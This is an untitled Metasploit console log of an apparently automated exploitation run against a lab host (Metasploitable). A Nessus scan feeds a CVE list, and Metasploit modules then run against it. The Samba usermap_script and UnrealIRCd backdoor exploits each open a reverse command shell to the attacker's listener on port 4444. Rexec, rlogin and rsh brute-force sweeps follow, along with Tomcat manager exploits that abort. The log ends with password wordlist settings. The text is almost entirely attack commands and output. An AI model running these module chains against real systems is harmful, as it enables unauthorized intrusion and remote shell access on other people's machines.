Untitled

 Spooling to file /root/Bureau/output... Deleted workspace: test Added workspace: test Workspace: test exec: service nessusd start Connecting to https://localhost:8834/ as admin User admin authenticated successfully. RHOST => 192.168.26.134 RHOSTS => 192.168.26.134 Scan created Scan launched Scan completed Exporting scan The export file ID for scan ID 779 is 1546865377 Checking export status... The status of scan ID 779 export is ready Importing scan results to the database... Importing data of 192.168.26.134 Done CVE list CVE-1999-0632 CVE-1999-0554 CVE-1999-0524 CVE-2007-1858 CVE-2008-5161 CVE-2014-3566 CVE-2015-0204 CVE-2015-0204 CVE-2015-4000 CVE-2015-4000 CVE-2013-2566 CVE-2015-2808 CVE-2016-0800 CVE-2011-0411 CVE-2011-1430 CVE-2011-1431 CVE-2011-1432 CVE-2011-1506 CVE-2011-2165 CVE-2016-2118 CVE-2016-2118 CVE-2007-2447 CVE-2007-2447 CVE-1999-0170 CVE-1999-0211 CVE-1999-0554 CVE-2003-1567 CVE-2004-2320 CVE-2010-0386 CVE-2012-0053 CVE-1999-0497 CVE-1999-0651 CVE-1999-0651 CVE-2010-2075 CVE-2012-6392 CVE-2008-0166 CVE-2008-0166 CVE-2009-3099 CVE-2009-3548 CVE-2010-0557 CVE-2010-4094 *++*Exploit auxiliary/scanner/http/ssl_version for CVE 2014-3566 Name: HTTP SSL/TLS Version Detection (POODLE scanner) Module: auxiliary/scanner/http/ssl_version License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2014-10-14 Provided by: todb Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 443 yes The target port SSL true no Negotiate SSL/TLS for outgoing connections SSLVersion Auto no Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, SSL2, SSL3, SSL23, TLS, TLS1, TLS1.1, TLS1.2) THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host Description: Check if an HTTP server supports a given version of SSL/TLS. If a web server can successfully establish an SSLv3 session, it is likely to be vulnerable to the POODLE attack described on October 14, 2014, as a patch against the attack is unlikely. References: http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html http://www.osvdb.org/113251 http://cvedetails.com/cve/2014-3566/ Auxiliary module running as background job Scanned 1 of 1 hosts (100% complete) *++*Exploit exploit/multi/samba/usermap_script for CVE 2007-2447 Name: Samba "username map script" Command Execution Module: exploit/multi/samba/usermap_script Platform: Unix Privileged: Yes License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2007-05-14 Provided by: jduck Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.26.134 yes The target address RPORT 139 yes The target port Payload information: Space: 1024 Description: This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication! References: http://cvedetails.com/cve/2007-2447/ http://www.osvdb.org/34700 http://www.securityfocus.com/bid/23972 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534 http://samba.org/samba/security/CVE-2007-2447.html Exploit running as background job. Started reverse TCP double handler on 192.168.26.207:4444 Accepted the first client connection... Accepted the second client connection... Command: echo fQqu2RdPJiFFHjbL; Writing to socket A Writing to socket B Reading from sockets... Reading from socket B B: "fQqu2RdPJiFFHjbL\r\n" Matching... A is input... Command shell session 1 opened (192.168.26.207:4444 -> 192.168.26.134:55144) at 2016-05-26 12:29:58 +0100 *++*Exploit auxiliary/scanner/nfs/nfsmount for CVE 1999-0170 Name: NFS Mount Scanner Module: auxiliary/scanner/nfs/nfsmount License: Metasploit Framework License (BSD) Rank: Normal Provided by: tebo Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PROTOCOL udp yes The protocol to use (Accepted: udp, tcp) RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 111 yes The target port THREADS 1 yes The number of concurrent threads Description: This module scans NFS mounts and their permissions. References: http://cvedetails.com/cve/1999-0170/ http://www.ietf.org/rfc/rfc1094.txt Auxiliary module running as background job 192.168.26.134:111 - 192.168.26.134 NFS Export: / [*] 192.168.26.134:111 - Scanned 1 of 1 hosts (100% complete) *++*Exploit auxiliary/scanner/rservices/rexec_login for CVE 1999-0651 Name: rexec Authentication Scanner Module: auxiliary/scanner/rservices/rexec_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list ENABLE_STDERR false yes Enables connecting the stderr port PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 512 yes The target port STDERR_PORT no The port to listen on for stderr STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Description: This module will test an rexec service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). References: http://cvedetails.com/cve/1999-0651/ http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job 192.168.26.134:512 - 192.168.26.134:512 - Starting rexec sweep 192.168.26.134:512 - Scanned 1 of 1 hosts (100% complete) *++*Exploit auxiliary/scanner/rservices/rlogin_login for CVE 1999-0651 Name: rlogin Authentication Scanner Module: auxiliary/scanner/rservices/rlogin_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list FROMUSER no The username to login from FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt no File containing from usernames, one per line PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 513 yes The target port SPEED 9600 yes The terminal speed desired STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TERM vt100 yes The terminal type desired THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Description: This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). References: http://cvedetails.com/cve/1999-0651/ http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job 192.168.26.134:513 - 192.168.26.134:513 - Starting rlogin sweep 192.168.26.134:513 - Scanned 1 of 1 hosts (100% complete) *++*Exploit auxiliary/scanner/rservices/rsh_login for CVE 1999-0651 Name: rsh Authentication Scanner Module: auxiliary/scanner/rservices/rsh_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list ENABLE_STDERR false yes Enables connecting the stderr port FROMUSER no The username to login from FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt no File containing from usernames, one per line PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 514 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Description: This module will test a shell (rsh) service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). References: http://cvedetails.com/cve/1999-0651/ http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job 192.168.26.134:514 - 192.168.26.134:514 - Starting rsh sweep 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'root' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'daemon' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'bin' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'nobody' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from '+' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'guest' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - 192.168.26.134:514 RSH - Attempting rsh with username '' from 'mail' 192.168.26.134:514 - Result: Permission denied. 192.168.26.134:514 - Scanned 1 of 1 hosts (100% complete) *++*Exploit exploit/unix/irc/unreal_ircd_3281_backdoor for CVE 2010-2075 Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution Module: exploit/unix/irc/unreal_ircd_3281_backdoor Platform: Unix Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2010-06-12 Provided by: hdm Available targets: Id Name -- ---- 0 Automatic Target Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.26.134 yes The target address RPORT 6667 yes The target port Payload information: Space: 1024 Description: This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. References: http://cvedetails.com/cve/2010-2075/ http://www.osvdb.org/65445 http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt Exploit running as background job. Started reverse TCP double handler on 192.168.26.207:4444 192.168.26.134:6667 - Connected to 192.168.26.134:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached) 192.168.26.134:6667 - Sending backdoor command... Accepted the first client connection... Accepted the second client connection... Command: echo r5ImdFHNBj1Bph2K; Writing to socket A Writing to socket B Reading from sockets... Reading from socket B B: "r5ImdFHNBj1Bph2K\r\n" Matching... A is input... Command shell session 2 opened (192.168.26.207:4444 -> 192.168.26.134:55146) at 2016-05-26 12:30:35 +0100 *++*Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2009-3548 Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution Module: exploit/multi/http/tomcat_mgr_deploy Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: jduck Available targets: Id Name -- ---- 0 Automatic 1 Java Universal 2 Windows Universal 3 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit running as background job. Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. *++*Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2009-3548 Name: Apache Tomcat Manager Authenticated Upload Code Execution Module: exploit/multi/http/tomcat_mgr_upload Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: rangercha Available targets: Id Name -- ---- 0 Java Universal 1 Windows Universal 2 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit running as background job. Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. *++*Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2009-3548 Name: Tomcat Application Manager Login Utility Module: auxiliary/scanner/http/tomcat_mgr_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: MC Matteo Cantoni jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 8080 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host Description: This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://www.securityfocus.com/bid/37086 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html http://www.zerodayinitiative.com/advisories/ZDI-09-085 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/ http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job 192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080). Scanned 1 of 1 hosts (100% complete) *++*Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2010-0557 Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution Module: exploit/multi/http/tomcat_mgr_deploy Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: jduck Available targets: Id Name -- ---- 0 Automatic 1 Java Universal 2 Windows Universal 3 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit running as background job. Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. *++*Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2010-0557 Name: Apache Tomcat Manager Authenticated Upload Code Execution Module: exploit/multi/http/tomcat_mgr_upload Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: rangercha Available targets: Id Name -- ---- 0 Java Universal 1 Windows Universal 2 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit running as background job. Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. *++*Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2010-0557 Name: Tomcat Application Manager Login Utility Module: auxiliary/scanner/http/tomcat_mgr_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: MC Matteo Cantoni jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 8080 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host Description: This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://www.securityfocus.com/bid/37086 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html http://www.zerodayinitiative.com/advisories/ZDI-09-085 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/ http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job 192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080). Scanned 1 of 1 hosts (100% complete) *++*Exploit exploit/multi/http/tomcat_mgr_deploy for CVE 2010-4094 Name: Apache Tomcat Manager Application Deployer Authenticated Code Execution Module: exploit/multi/http/tomcat_mgr_deploy Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: jduck Available targets: Id Name -- ---- 0 Automatic 1 Java Universal 2 Windows Universal 3 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit running as background job. Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. *++*Exploit exploit/multi/http/tomcat_mgr_upload for CVE 2010-4094 Name: Apache Tomcat Manager Authenticated Upload Code Execution Module: exploit/multi/http/tomcat_mgr_upload Platform: Java, Linux, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2009-11-09 Provided by: rangercha Available targets: Id Name -- ---- 0 Java Universal 1 Windows Universal 2 Linux x86 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.26.134 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload information: Description: This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html Exploit running as background job. Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check. *++*Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2010-4094 Name: Tomcat Application Manager Login Utility Module: auxiliary/scanner/http/tomcat_mgr_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: MC Matteo Cantoni jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 8080 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host Description: This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. References: http://cvedetails.com/cve/2009-3843/ http://www.osvdb.org/60317 http://www.securityfocus.com/bid/37086 http://cvedetails.com/cve/2009-4189/ http://www.osvdb.org/60670 http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html http://www.zerodayinitiative.com/advisories/ZDI-09-085 http://cvedetails.com/cve/2009-4188/ http://www.securityfocus.com/bid/38084 http://cvedetails.com/cve/2010-0557/ http://www-01.ibm.com/support/docview.wss?uid=swg21419179 http://cvedetails.com/cve/2010-4094/ http://www.zerodayinitiative.com/advisories/ZDI-10-214 http://cvedetails.com/cve/2009-3548/ http://www.osvdb.org/60176 http://www.securityfocus.com/bid/36954 http://tomcat.apache.org/ http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job 192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080). Scanned 1 of 1 hosts (100% complete) VERBOSE => false PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt USER_FILE => /usr/share/metasploit-framework/data/wordlists/unix_users.txt Exploit: 